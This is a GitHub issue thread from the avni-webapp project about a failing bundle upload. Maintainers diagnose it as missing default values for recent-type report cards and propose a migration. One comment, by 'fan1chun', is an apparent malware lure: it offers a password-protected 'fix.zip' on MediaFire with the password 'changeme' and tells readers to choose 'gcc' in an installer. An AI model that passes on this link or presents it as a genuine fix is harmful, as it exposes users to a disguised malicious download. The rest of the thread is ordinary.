### ISSUE TITLE
Uploading bundle is not working..

### ISSUE THREAD

**Issue by AchalaBelokar** [avniproject/avni-webapp#1321]
**Describe the bug**
Uploading bundle is not working on prerelease 
I am login with maha@apf2 and clear all the data and then I uploaded new bundle which I created from AchalaB@rwbnituat.
this is the bundle 
[RWB NITI Aayog UAT (6).zip](https://github.com/user-attachments/files/16795014/RWB.NITI.Aayog.UAT.6.zip)
I uploaded it on maha@apf2 it is giving me this error.
[errors-RWB NITI Aayog UAT (6).csv](https://github.com/user-attachments/files/16795062/errors-RWB.NITI.Aayog.UAT.6.csv)

**To Reproduce**

1. Login in to maha@apf2
2. upload this bundle you got the error

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mahalakshme** [comment]
@AchalaBelokar add the env details

**Comment by himeshr** [comment]
Issue caused due to missing defaults during bundle upload for StandardReportCards Recent type cards default duration value.

**Comment by 1t5j0y** [comment]
@himeshr handle this via migration instead so that existing recent (last 24) standard type cards will have the value set and will get synced to client / displayed on webapp / handled in bundle?

**Comment by himeshr** [comment]
Absorbed the review comments
